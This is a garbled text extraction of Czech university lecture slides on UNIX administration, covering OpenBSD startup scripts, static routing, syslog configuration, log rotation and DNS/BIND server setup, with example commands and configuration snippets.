Administrace UNIXu Leo Galamboš Instalace Pˇred instalací Instalace Po instalaci
Souborové systémy 1
Napište skripty pro rc.d v OpenBSD. Jejich úložišteˇ ˇ být v /usr/local/etc/rcN.d. by melo
Minix Filesystem ext2 Další vývoj fsck Benchmark Linuxu
2
3
Použijte je napˇríklad pro start a shození sshd a dalších démonu˚ nyní startovaných v /etc/rc. Jaké mají nové skripty (ne)výhody oproti puvodním? ˚
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD OpenBSD SystemV Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
Vyzkoušejte si
Administrace UNIXu Leo Galamboš Instalace Pˇred instalací Instalace Po instalaci
Souborové systémy Minix Filesystem
1
2 3
smažte obrazovku pˇred každou výzvou k pˇrihlášení, ˇ nápoveda: cl = \E[H\E[2J a gettytab ˇ úvodní i pˇrihlašovací zprávu zmeˇ nte upravte motd(5) tak, aby neobsahoval dlouhý text
ext2 Další vývoj fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD OpenBSD SystemV Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
Vyzkoušejte si
Administrace UNIXu Leo Galamboš Instalace
1
v /etc/sysctl.conf povolte Ctrl-Alt-Del pro halt
2
restartujte VPC
3
4
ˇ rte provedení zmeny ˇ sysctl oveˇ machdep.kbdreset (=1) ˇ v /etc/ttys všechny “secure” terminály na zmeˇ nte ne-“secure”
5
ˇ vytvoˇrte si bežného uživatele useradd -m yahoo
6
nastavte mu heslo passwd yahoo
7
odlogujte se ze všech terminálu˚ VPC
Pˇred instalací Instalace Po instalaci
Souborové systémy Minix Filesystem ext2 Další vývoj fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD OpenBSD SystemV Nová vlna
Instalace software Správa uživatelu˚
Úkol
Dodatky
Pˇridejte uživatele yahoo do skupiny wheel.
Cviˇcení
Administrace UNIXu Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny
ˇ Cást III
Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu
ˇ Smerování, DNS
Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
Obsah
Administrace UNIXu
ˇ Smerování ˇ Statické smerování Linuxoviny
ˇ Smerování
19
Zpracování zpráv systému
Zpracování zpráv systému
20
Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
18
21
Cviˇcení
Leo Galamboš
ˇ Statické smerování Linuxoviny
Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
Administrace UNIXu
Pˇríklad
Leo Galamboš
B
F
10.10.20.0/24
10.10.60.0/24
ˇ Smerování ˇ Statické smerování Linuxoviny
Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS
C
D
E
10.10.30.0/24
10.10.40.0/24
10.10.50.0/24
Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
A
G
10.10.10.0/24
10.10.70.0/24
ˇ Smerování
Administrace UNIXu Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny
Zpracování zpráv systému 1
dynamické ˇ (systémy) uvnitˇr anebo mezi autonomními sítemi RIPv2, IGRP, OSPF, BGP, EGP. . . zebra/quagga, gated, routed OpenBGPD, OpenOSPFD, BIRD
Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname
2
statické
Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
Administrace UNIXu
ˇ Smerovací tabulky
Leo Galamboš ˇ Smerování ˇ Statické smerování
lo 127.0.0.0/8
Linuxoviny
eth0
Stanice
Zpracování zpráv systému
ostatní
Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru
Kernel IP routing table Destination Gateway 195.113.18.0 0.0.0.0 127.0.0.0 0.0.0.0 0.0.0.0 195.113.19.222
BIND implementace
Genmask 255.255.254.0 255.0.0.0 0.0.0.0
Flags U U UG
MSS 0 0 0
Window 0 0 0
irtt 0 0 0
Iface eth0 lo eth0
Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
195.113.18.0/23 pˇrímo dosažitelné na eth0 127.0.0.0/8 pˇrímo dosažitelné na lo ˇ ostatní na defaultní smerovaˇ c 195.113.19.222 za eth0
Cviˇcení
Administrace UNIXu
ˇ Smerovací tabulky aktivních spojení
Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny
$ /sbin/route -Cn Kernel IP routing cache Source Destination 74.125.87.101 172.315.48.50 172.315.48.41 172.315.48.50 172.315.48.50 172.315.48.41 127.0.0.1 127.0.0.1 172.315.48.50 172.315.48.41 172.315.48.50 74.125.13.89 172.315.48.50 172.315.48.1 172.315.48.50 172.315.48.1 172.315.48.50 74.125.13.89 74.125.13.89 172.315.48.50 172.315.48.50 74.125.87.101 127.0.0.1 127.0.0.1 172.315.48.50 74.125.87.101 172.315.48.1 172.315.48.50
Zpracování zpráv systému Gateway 172.315.48.50 172.315.48.50 172.315.48.41 127.0.0.1 172.315.48.41 172.315.48.1 172.315.48.1 172.315.48.1 172.315.48.1 172.315.48.50 172.315.48.1 127.0.0.1 172.315.48.1 172.315.48.50
Flags Metric Ref l 0 0 il 0 0 0 0 l 0 0 0 1 0 0 0 0 0 0 0 1 l 0 0 0 1 l 0 0 0 0 il 0 0
Use 2 2 0 13 1 0 6 6 1 3 1 6 0 6
Iface lo lo eth1 lo eth1 eth1 eth1 eth1 eth1 lo eth1 lo eth1 lo
Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
ˇ Smerovací tabulky
Administrace UNIXu Leo Galamboš
netstat(8) ˇ -r výpis smerovacích tabulek -n bez symbolických jmen route(8) ˇ show výpis smerovacích tabulek add pˇridání nové cesty do tabulky ˇ cesty z tabulky delete odstranení
ˇ Smerování ˇ Statické smerování Linuxoviny
Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility
ifconfig(8) – parametry na sít’ových adaptérech
Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby
Inicializace ˇ startovací skripty. Platformoveˇ závislé, provádejí OpenBSD /etc/netstart /etc/mygate /etc/hostname.* Gentoo /etc/conf.d/net
Praxe
Cviˇcení
Detekce špatneˇ nastavených tabulek
Administrace UNIXu Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny
Zpracování zpráv systému $ ping -A ns.cythres PING ns.cythres (172.****) 56(84) bytes of data. 64 bytes from ns.cythres (172.****): icmp_seq=1 ttl=255 time=0.202 ms 64 bytes from ns.cythres (172.****): icmp_seq=2 ttl=255 time=0.207 ms : :
Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility
$ ping 172.16.255.1 sendto: Network is unreachable
Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
Administrace UNIXu
Centralizovaný ip tool
Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny # ip addr show 1: lo:
mtu 65536 qdisc noqueue state UNKNOWN group default Zpracování zpráv link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 systému inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever Domain Name inet6 ::1/128 scope host System valid_lft forever preferred_lft forever Zóny a domény
Co je potˇreba pro zónu
# ip addr add 192.168.300.4 dev p5p1 # ip addr del 192.168.300.4/24 dev p5p1
Módy dotazu˚ do DNS Name servery Konfigurace serveru
# ip link set p5p1 up # ip link set p5p1 down
BIND implementace Klientské utility Pˇrevod IP→hostname
# ip route show default via 192.168.300.254 dev p5p1 proto static metric 100 172.16.304.0/24 dev vmnet1 proto kernel scope link src 172.16.304.1 192.168.300.0/24 dev p5p1 proto kernel scope link src 192.168.300.252 192.168.301.0/24 dev vmnet8 proto kernel scope link src 192.168.301.1 # ip route add 172.16.300.0/24 via 192.168.300.0 dev p5p1 # ip route del 172.16.300.0/24 # ip route add default via 192.168.333.1
Pˇríklady, speciality Typické pasti a chyby Praxe
metric 3 Cviˇcení
Network Manager
Administrace UNIXu Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny
Zpracování zpráv systému
# nmcli OBJECT CMD OBJECT g[eneral] n[etworking] r[adio] c[onnection] d[evice] a[gent]
Domain Name System NetworkManager’s general status and operations overall networking control NetworkManager radio switches NetworkManager’s connections devices managed by NetworkManager NetworkManager secret agent or polkit agent
Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility
# # # # #
nmcli nmcli nmcli nmcli nmcli
con con con con con
add type bond con-name bond0 ifname bond0 mode 802.3ad add type bond-slave ifname p4p1 master bond0 add type bond-slave ifname em1 master bond0 delete em1 delete p4p1
Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
Administrace UNIXu
Syslog
Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny
démon starající se o nakládání s logy/zprávami zprávy jsou urˇcené zdrojem (modul systému: kernel, user prg, mail. daemon, auth. . . ) a úrovní konfigurace /etc/syslog.conf urˇcuje: komu bude zpráva doruˇcena na konzoli do jakého souboru bude zpráva pˇripsána na jaký stroj bude zpráva pˇredána
Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality
unsecure mód: syslog_flags -u (remote accept) API: openlog(3) a syslog(3) ˇ software: metalog, syslog-ng, rsyslog, . . . novejší
Typické pasti a chyby Praxe
Cviˇcení
Administrace UNIXu
Pozadí
Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny
originální syslog je de-facto standard status quo formalizován v RFC 3164 další rozvoj v rámci RFC 5424
Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS
ˇ transport zpráv (TCP/TLS RFC 5425) spolehlivejší podpora puvodního ˚ stylu s UDP (RFC 5426) formalizace kategorií zpráv (RFC 5427) autentizace puvodu, ˚ integrita, odolnost proti ˇ opakování, cˇ íslování a detekce chybejících zpráv (RFC 5484)
Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
Administrace UNIXu
Selektory
Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny
Zdroje zpráv auth, authpriv cron daemon
Úrovneˇ zpráv emerg alert
kern
crit
lpr
err
mail mark news
notice info
user
debug
local0. . . local7
Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility
warning
syslog uucp
Zpracování zpráv systému
Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
Administrace UNIXu
Pˇríklad
Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny
!* *.notice;auth,authpriv,cron,ftp,kern.none *.emerg kern.debug;user.info;syslog.info auth.info authpriv.debug cron.info daemon.info ftp.info lpr.debug mail.info *.notice;ftp,kern,lpr,mail,user.none !sudo *.* !!sudo
/var/log/messages * root /var/log/authlog /var/log/secure /var/cron/log /var/log/daemon /var/log/xferlog /var/log/lpd-errs /var/log/maillog @loghost:514 /var/log/sudo
Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
Administrace UNIXu
Syntax
Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny
Zpracování zpráv systému
ˇ logují se i úrovneˇ nad když je specifikována úroven, ní ˇ nekteré verze nemusí mít kompletní podporu pro syntax a la OpenBSD (napˇríklad IBM UNIXy) zkratka “ˇcárka” není podporována znaˇckované bloky (proces name/PID)
mezi selekcí a akcí je jeden nebo více tabulátoru˚
Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
Rotování logu˚
Administrace UNIXu Leo Galamboš
Rotování logu˚ zajišt’uje další démon, napˇríklad newsyslog(8) nebo logrotate.
ˇ Smerování ˇ Statické smerování Linuxoviny
Zpracování zpráv systému
ˇ Rotování probíhá v nekolika krocích:
Domain Name System Zóny a domény
staré logy se pˇremístí na nové místo
Co je potˇreba pro zónu
2
ˇ touch-nou se soubory na puvodních ˚ umísteních
Name servery
3
HUPne se syslogd, respektive se pošle správnému programu správný signál
1
Módy dotazu˚ do DNS
Konfigurace serveru BIND implementace
4
zpracují se staré soubory (komprese)
Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
ˇ V OpenBSD je k dispozici newsyslog(8) spouštený root-em v rámci jeho crontab-u každou celou hodinu.
Administrace UNIXu
/etc/newsyslog.conf
Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny
# logfilename owner:group /var/cron/log root:wheel /var/log/authlog root:wheel /var/log/daemon /var/log/lpd-errs /var/log/maillog /var/log/messages /var/log/secure /var/log/wtmp /var/log/xferlog /var/www/logs/access_log ...> /var/run/httpd.pid SIGUSR1 /var/www/logs/error_log ...> /var/run/httpd.pid SIGUSR1
mode 600 640 640 640 600 644 600 644 640 644
ngen 3 7 5 7 7 5 7 7 7 7
size 10 * 30 10 * 30 * * 250 250
time [ZB] Zpracování zpráv systému Z * 168 Z Domain Name System Z * Zóny a domény Z * Co je potˇreba pro zónu 24 Z Módy dotazu˚ do DNS Name servery Z * Konfigurace serveru 168 Z BIND implementace 168 ZB Klientské utility Pˇrevod IP→hostname Z * Pˇríklady, speciality Z ...> Typické pasti a chyby *
644
7
250
*
Praxe
Z ...>Cviˇcení
Administrace UNIXu
Praxe
Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny
Zpracování zpráv systému
jeden syslog box realizující logování pro více stroju˚ syslog box bez možnosti sít’ového pˇripojení (ssh) syslog box s paranoidní bezpeˇcností bez dalších démonu˚ ˇ ˇ zablokování nekterých API volání kernelu (zmeny ˇ smerování. ..)
Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
Praxe
Administrace UNIXu Leo Galamboš ˇ Smerování
syslog-ng, rsyslog podpora TCP, SSL kvuli ˚ spolehlivosti ukládání zpráv pˇrímo do DB (SQL, MongoDB) versus problematika BigData
ˇ Statické smerování Linuxoviny
Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru
systemd/journald (Linux)
BIND implementace Klientské utility Pˇrevod IP→hostname
nativní append-only binární soubory, ev. redirekce do syslog-ng, rsyslog syslog muže ˚ být i klientem jako journalctl(1)40 centralismus dává horší výkony i granularitu
40
Pˇrístup ke zprávám pˇred startem syslog
Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
Zaˇcátky
Administrace UNIXu Leo Galamboš ˇ Smerování
V roce 1970 má ARPAnet pár stroju˚ a jejich báze je v jednom souboru spravovaném na Network Information Center ve Stanford Research Institute. Do centrály ˇ a stahují si aktuální verzi posílají lokální správci zmeny báze. S rustem ˚ síteˇ a plným pˇrechodem na TCP/IP byl tento zpusob ˚ práce neudržitelný.
ˇ Statické smerování Linuxoviny
Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
ˇ ren vytvoˇrením distribuovaného Paul Mockapetris byl poveˇ systému → RFC 882 883 (1984) → RFC 1034 1035 (souˇcasné)
Cviˇcení
Zivot bez DNS: /etc/hosts
Administrace UNIXu Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny
Zpracování zpráv systému
# # Table of IP addresses and hostnames # 127.0.0.1 localhost 172.16.12.1 logger.firma.cz loghost 172.16.1.2 oracle.firma.com ora
Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
Administrace UNIXu
Zóny a domény
Leo Galamboš ˇ Smerování ˇ Statické smerování
cz
Linuxoviny
Zpracování zpráv systému Domain Name System
cuni
Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS
lf
mff
pedf
Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby
www
cs
Praxe
Cviˇcení
Administrace UNIXu
Zóny a domény
Leo Galamboš ˇ Smerování ˇ Statické smerování
cz
Linuxoviny
Zpracování zpráv systému Domain Name System
cuni
Zóny a domény Co je potˇreba pro zónu
lf
mff
pedf
A
Módy dotazu˚ do DNS
195.113.36.2
Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality
www CNAME
cs
A
Typické pasti a chyby
195.113.20.12
Praxe
Cviˇcení
Administrace UNIXu
Zóny a domény
Leo Galamboš ˇ Smerování ˇ Statické smerování
cz
Linuxoviny
Zpracování zpráv systému Domain Name System
cuni
Zóny a domény Co je potˇreba pro zónu
lf
mff
pedf
A
Módy dotazu˚ do DNS
195.113.36.2
Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality
www CNAME
cs
A
Typické pasti a chyby
195.113.20.12
cuni.cz domain
Praxe
Cviˇcení
Administrace UNIXu
Zóny a domény
Leo Galamboš ˇ Smerování
delegování
cz
ˇ Statické smerování Linuxoviny
Zpracování zpráv systému Domain Name System
cuni
Zóny a domény Co je potˇreba pro zónu
lf
mff
pedf
A
Módy dotazu˚ do DNS
195.113.36.2
Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality
www CNAME
cs
A
Typické pasti a chyby
195.113.20.12
Praxe
Cviˇcení
Administrace UNIXu
Zóny a domény
Leo Galamboš ˇ Smerování
delegování
cz
zone
cuni
ˇ Statické smerování Linuxoviny
Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu
lf
mff
pedf
A
Módy dotazu˚ do DNS
195.113.36.2
Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality
www CNAME
cs
A
Typické pasti a chyby
195.113.20.12
Praxe
Cviˇcení
Doménová jména
Administrace UNIXu Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny
zapisují se od nejvíce po nejméneˇ významnou cˇ ást (od hostname k top-level) FQDN (fully qualified domain name) konˇcí doménou ˇ napˇríklad www.hq.firma.com. nejvyšší úrovne,
Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru
ˇ relativní jméno - systém k nemu pˇripojí defaultní doménové jméno, napˇríklad www.hq ˇ na vetšin eˇ systému˚ se ke jménu s teˇckou již nepˇripojuje defaultní doménové jméno
BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
Administrace UNIXu
Zóny
Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny
Zpracování zpráv systému
pro zónu musí existovat alesponˇ jeden autoritativní DNS
Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS
ˇ vetšinou se požadují alesponˇ dva
Name servery Konfigurace serveru
AADNS: plneˇ postaˇcuje, když podporuje nerekursivní mód
BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
Dotazy do DNS
Administrace UNIXu Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny
Zpracování zpráv systému Domain Name System
nerekursivní (iterativní) mód vrací jen známou informaci nebo hint
Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru
rekursivní mód následuje hinty a celý dotaz se doˇreší
BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
Name servery
Administrace UNIXu Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny
primár (master) cˇ te data o zóneˇ z konfiguraˇcního souboru sekundár (slave) cˇ te data pˇri svém startu z primáru a pak v urˇcitých intervalech ˇ keš dotazuje se AADNS serveru a odpovedi kešuje proxy (forwarder) všechny neresolvované dotazy ˇ posílá na jiný DNS server a kešuje odpovedi
Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
Primár i sekundár jsou rovnocennými AADNS, liší se jen zdrojem svých informací. . . viz následující schéma. . .
Administrace UNIXu
Name servery
Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny
Vzdálený admin
Master AXFR IXFR Slave
Resolver Remote caching
TSIG
DNSSEC
Zpracování zpráv systému
Zóny a domény Co je potˇreba pro zónu
Proxy
Name servery
BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby
Speed
Lokální disk
Módy dotazu˚ do DNS
Konfigurace serveru
High Disk
Domain Name System
Praxe
Dumb
Cviˇcení
Konfigurace DNS (systém)
Administrace UNIXu Leo Galamboš ˇ Smerování ˇ Statické smerování
1
2
režim práce DNS — /var/named/etc/named.conf soubory se zónami (AADNS)41 /var/named/master/* /var/named/slave/* /var/named/standard/*: root hint, loopback, localhost
3
41
ˇ v chroot-u a syslogd(8) mu dává BIND cˇ asto beží do ohrádky rouru dev/log — OpenBSD: nastavte named_flags a restartujte nebo jen restartujte syslogd se správnými parametry
OpenBSD rozložení
Linuxoviny
Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
Konfigurace BIND8/9 – primár (master)
Administrace UNIXu Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny
zone "example.com" IN { type master; file "master/example.com"; };
Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname
ˇ mají AA bit odpovedi existuje “primary master” – NS v SOA (význam pro dynamické updaty) nemá souvislost s primary/secondary v MS-Windows
Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
Konfigurace BIND8/9 – sekundár (slave)
Administrace UNIXu Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny
zone "example.com" IN { type slave; file "slave/example.com"; masters { 192.168.300.2; }; };
Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname
stahuje z “masters” aktuální stav zóny (expiry v SOA)
Pˇríklady, speciality Typické pasti a chyby Praxe
nikdy nepoužívá zastaralá data “file” je nepovinný atribut, de-facto zrychluje restarty BINDu
Cviˇcení
Konfigurace BIND8/9 – keš
Administrace UNIXu Leo Galamboš
options { directory "/var/named"; version "ouha"; recursion yes; }; // cokoliv zone "." IN { type hint; file "root.servers"; };
ˇ Smerování ˇ Statické smerování Linuxoviny
Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname
RR z primáru/sekundáru zóny vrací s AA bitem, z keše ne ˇ to keš musí mít povolenou rekursi (je defaultne), implikuje “hint” sekci ˇ neukládá se na disk keš je pouze v pameti, ˇ keš zatežuje samotný server, nehodí se na 1000q/sec
Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
Konfigurace BIND8/9 – proxy
Administrace UNIXu Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny
Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace
fallback
Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby
forwarder
Praxe
Cviˇcení
Konfigurace BIND8/9 – proxy
Administrace UNIXu Leo Galamboš ˇ Smerování ˇ Statické smerování
options { // globálnˇ e directory "/var/named"; version "ouha"; forwarders {192.168.300.1; 192.168.300.2;}; forward only; };
Linuxoviny
Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS
zone "example.com" IN { // per domain type forward; forwarders {192.168.300.1; 192.168.300.2;}; };
Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
ˇ podporovat rekurzivitu cíl by mel
Konfigurace BIND8/9 – proxy
Administrace UNIXu Leo Galamboš ˇ Smerování ˇ Statické smerování
options { forwarders {12.266.48.32; }; forward only; };
Linuxoviny
Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility
Server nadále spoléhá na vlastní autoritativní záznamy, ale pak již výhradneˇ na forwarder (direktiva forward-only).
Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
Otázka K cˇ emu mít forwarder tohoto typu? Proˇc to nenapsat pˇrímo do resolv.conf(5)?
Ryze autoritativní DNS server
Administrace UNIXu Leo Galamboš
Definice ˇ mají výhradneˇ AA (server je tedy odpovedi master/slave) nekešuje
ˇ Smerování ˇ Statické smerování Linuxoviny
Zpracování zpráv systému Domain Name System Zóny a domény
options { directory "/var/named"; version "ouha"; recursion no; allow-transfer {"none";}; // v zónˇ e pak allow-transfer pro sekundáry };
Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
Využití zvýšení výkonu ˇ veˇrejný DNS server v rozdeleném DNS systému (soukromé/DMZ/veˇrejné)
Konfigurace BIND8/9 – komplex
Administrace UNIXu Leo Galamboš
options { directory "/var/named"; listen-on-v6 { none; }; listen-on { 127.0.0.1; }; }; zone "." IN { type hint; file "standard/root.hint"; };
ˇ Smerování ˇ Statické smerování Linuxoviny
Zpracování zpráv systému Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery
zone "cuni.cz" IN { type master; file "master/cuni.cz"; allow-transfer { 195.113.0.2; } allow-update { none; }; notify no; }; zone "egothor.org" IN { type slave; file "slave/egothor.org"; masters { 134.36.80.123; } allow-update { none; }; };
Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
Konfigurace DNS (zóny)
Administrace UNIXu Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny
$TTL 172800 ; 2 dny @ IN SOA
localhost. ns mail
IN IN IN IN IN
Zpracování zpráv systému
ns.localhost. root.localhost. ( 2002081601 ; Serial YYYYMMDDVV 28800 ; Refresh 14400 ; Update retry 604800 ; Expire - 1 week 86400 ) ; Minimum NS ns MX 10 mail.localhost. A 127.0.0.1 A 127.0.0.1 A 127.0.0.1
Domain Name System Zóny a domény Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
DNS záznamy (RR)
Administrace UNIXu Leo Galamboš ˇ Smerování ˇ Statické smerování Linuxoviny
SOA start-of-authority signalizuje autoritu nad danou zónou
Zpracování zpráv systému Domain Name System Zóny a domény
NS name-server v dané zóneˇ MX mail-exchanger v dané zóneˇ
Co je potˇreba pro zónu Módy dotazu˚ do DNS Name servery Konfigurace serveru BIND implementace
A name-to-address mapování PTR address-to-name mapování CNAME canonical name (alias)
Klientské utility Pˇrevod IP→hostname Pˇríklady, speciality Typické pasti a chyby Praxe
Cviˇcení
